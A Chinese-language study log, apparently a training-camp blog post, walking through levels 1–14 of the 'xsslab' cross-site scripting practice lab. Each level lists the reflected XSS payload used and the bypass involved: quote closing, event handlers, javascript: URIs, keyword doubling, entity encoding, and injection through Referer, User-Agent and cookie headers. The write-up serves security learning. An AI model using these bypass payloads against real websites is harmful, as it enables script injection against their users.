2023/7/21:夏令营week2记录:xsslab

1
<script "  'Oonn> 可以用来测闭合

level 1

将上面的test改为

1
<script>alert(1)</script>

level 2

检测搜索框内为双引号闭合

1
"><script>alert(1)</script>

level 3

“>”被替换了

1
keyword=1' onclick='alert(1) 补全标签

level 4

查看源码如下

1
<input name="keyword" value="script " 'oonn"="">

双引号闭合

1
keyword=1" onclick="alert(1) 补全标签

level 5

关键词过滤

1
<input name="keyword" value="<scr_ipt " 'oo_nn="">
1
keyword="><a href="javascript:alert(1)"

点一下下面的蓝色连接即可

level 6

在上一题基础上有了更多过滤

1
<a hr_ef="javascript:alert(1)" "="">
1
keyword="><a hRef="javascript:alert(1)"

?上一题过滤大小写这题不过滤?

level 7

似乎删掉了关键字

1
<input name="keyword" value="< " 'on="">

onclick删了on,过滤了但没完全过滤(

1
keyword=1" oonnclick="alert(1)

level 8

应该还是关键词过滤

1
<a href="<scr_ipt "  'oo_nn>">友情链接</a>

大小写绕过无效,自动转换为小写
可以编码绕过

1
2
&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;
以上字符串对javascript:alert(1)进行ascii编码

level 9

1
2
3
4
<input name="keyword" value="<script &quot;  'oonn>">
<input type="submit" name="submit" value="添加友情链接">

<a href="您的链接不合法?有没有!">友情链接</a>

?不太对劲,百度下源码
要加个http://,剩下与第8题一样
只要有这个字段就行

1
2
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;('http://')
刚开始还不知道拿这个http咋办,结果百度只要扔在后面就行

level 10

随便扔个关键字进去没反应
F12

1
2
3
<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">

url里的keyword估计啥用没有,再扔几下

1
<input name="t_sort" value="script " 'oonn"="" type="hidden">
1
t_sort=" onclick='alert(1)' type="text

关键应该就是type把hidden改掉

level 11

把上一题payload扔进去

1
<input name="t_sort" value="" onclick='alert(1)' type="text" type="hidden">

试了半天都差不多这样,麻
查了源码是referer请求头注入
题目好像有提示我傻了
把上一题的payload扔到referer里就行

level 12

又是请求头

1
<input name="t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" type="hidden">

?服务器拒绝连接太6了
跳了不知道什么情况

level 13

这题改cookie

1
<input name="t_cook" value="" type="hidden">

emm还要添个user

1
user=" onclick='alert(1)' type="text

level 14 (写不出来)

需要用到这个网站:http://ww1.exifviewer.org/ 需要梯子

查了下解法:
1.查看源码是iframe框,src到上面的网站
2.burp抓包请求,返回有字段X-Frame-Options:SAMEORIGIN(我抓了,没有,可能是我的问题),表示该页面要在相同域名的iframe中展示,修改为:X-Frame-Options:ALLOW-FROM http://…/xss/level14.php
3.这个网站可以从任意图像文件提取元数据,往文件写入xss payload
4.使用火狐firebug将scrolling=”no”改为yes会出现滚动条
5.win7修改图片属性可直接修改EXIF的值
6.payload:

1
'"><img src=1 onerror=alert(document.domain)>'

在上传过程不断修改返回包的X-Frame-Options字段

比前面的有趣,虽然我肯定不会写

level 15


后面都404了
先这样了